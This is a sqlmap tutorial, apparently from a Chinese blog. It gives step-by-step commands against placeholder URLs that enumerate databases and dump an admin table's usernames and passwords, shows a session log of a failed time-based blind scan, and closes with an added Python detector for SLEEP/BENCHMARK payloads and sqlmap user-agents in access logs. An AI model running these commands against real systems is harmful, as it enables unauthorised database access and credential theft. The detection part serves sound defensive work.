SQL injection testing with SQLMAP


https://blog.csdn.net/qq_32502511/article/details/80407253


  1. Install Python

sqlmap's runtime environment currently only supports Python 2.x

  2. Install SQLMap

Official site: http://sqlmap.org/

  3. Common SQLMap commands
  1. sqlmap.py -u "http://www.XXX.com/index.asp?id=1"

    Checks whether the id parameter is injectable: output containing “id” is Vulnerable means an injection point exists.

    Only if an injection point exists can the following steps succeed.

  2. sqlmap.py -u "http://www.XXX.com/index.asp?id=1" --dbs

    Lists all database names that can be enumerated.

  3. sqlmap.py -u "http://www.XXX.com/index.asp?id=1" --current-db

    Lists the database currently in use; assume it returns the database “sqltest”.

  4. sqlmap.py -u "http://www.XXX.com/index.asp?id=1" --is-dba

    Checks whether the injection point runs with administrator (DBA) privileges: true means it does.

  5. sqlmap.py -u "http://www.XXX.com/index.asp?id=1" -D "sqltest" --tables

    Gets all tables in sqltest; assume there is an "admin" table.

  6. sqlmap.py -u "http://www.XXX.com/index.asp?id=1" -D "sqltest" -T "admin" --columns

    Lists the fields (column names) of the admin table; assume the "username" and "password" fields exist.

  7. sqlmap.py -u "http://www.XXX.com/index.asp?id=1" -D "sqltest" -T "admin" -C "username,password" --dump

    Dumps the values of the username and password fields; if asked whether to crack the MD5 hashes, choose no.

For example:

I:\sqlmap>sqlmap.py -u "http://xxxx.com/xxx?a=xxxf&b=xxx" -p a --risk 3 --level 3 --dbms=MYSQL --technique=T
___
__H__
___ ___[,]_____ ___ ___ {1.3.4.13#dev}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:25:35 /2019-04-03/

[20:25:36] [INFO] testing connection to the target URL
[20:25:37] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:25:37] [WARNING] heuristic (basic) test shows that GET parameter 'userId' might not be injectable
[20:25:37] [INFO] testing for SQL injection on GET parameter 'userId'
[20:25:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[20:25:38] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[20:25:52] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[20:25:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[20:26:01] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
[20:26:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:26:10] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[20:26:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[20:26:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[20:26:21] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[20:26:26] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[20:26:32] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[20:26:37] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[20:26:44] [INFO] testing 'MySQL AND time-based blind (ELT)'
[20:26:50] [INFO] testing 'MySQL OR time-based blind (ELT)'
[20:26:55] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:27:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[20:27:03] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[20:27:03] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[20:27:04] [WARNING] GET parameter 'userId' does not seem to be injectable
[20:27:04] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 20:27:04 /2019-04-03/
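Seen from the server side, a run like the one above leaves a recognisable trail: a burst of requests whose query string carries MySQL delay primitives (SLEEP, BENCHMARK, ELT, PROCEDURE ANALYSE) and, unless --random-agent is used, a User-Agent naming sqlmap itself. The following is an added example, not part of the original post, that scans constructed combined-format access-log lines for those traces; the log lines, IPs and paths are invented for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format); not from the
# original post. The URL-encoded payload shapes mirror the MySQL time-based
# blind checks that sqlmap reported testing in the session above.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Apr/2019:20:25:36 +0800] "GET /index.asp?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [03/Apr/2019:20:25:38 +0800] "GET /index.asp?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "sqlmap/1.3.4.13#dev (http://sqlmap.org)"
10.0.0.5 - - [03/Apr/2019:20:26:21 +0800] "GET /index.asp?id=1%20AND%201234%3DBENCHMARK(5000000%2CMD5(0x41)) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [03/Apr/2019:20:27:10 +0800] "GET /index.asp?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# MySQL functions that have no business in a normal request parameter and are
# exactly the primitives time-based blind tests rely on to delay the query.
TIME_BASED_RE = re.compile(
    r'\b(SLEEP|BENCHMARK|ELT)\s*\(|PROCEDURE\s+ANALYSE\s*\(', re.IGNORECASE
)

def classify_request(line):
    """Parse one access-log line; return (ip, target, reasons), where reasons
    is empty for benign traffic, or None if the line is not in log format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    # Decode twice so %2C / %3D (and double-encoded variants) cannot hide the call.
    target = unquote_plus(unquote_plus(m.group("target")))
    if TIME_BASED_RE.search(target):
        reasons.append("time-based payload in query string")
    if "sqlmap" in m.group("ua").lower():
        reasons.append("sqlmap user-agent")
    return m.group("ip"), m.group("target"), reasons

def detect_sqlmap_probes(log_text):
    """Return the suspicious requests as (ip, raw target, reasons) tuples and a
    per-source-IP hit count, which is what an alert threshold would key on."""
    hits, per_ip = [], {}
    for line in log_text.splitlines():
        parsed = classify_request(line)
        if parsed and parsed[2]:
            hits.append(parsed)
            per_ip[parsed[0]] = per_ip.get(parsed[0], 0) + 1
    return hits, per_ip
```

Because the ORDER BY/GROUP BY and "Parameter replace" variants sqlmap tried also wrap SLEEP or BENCHMARK, the same pattern covers them; what it will not catch is a run with --tamper encodings that split the function name, which is why the per-IP request rate is kept as a second signal.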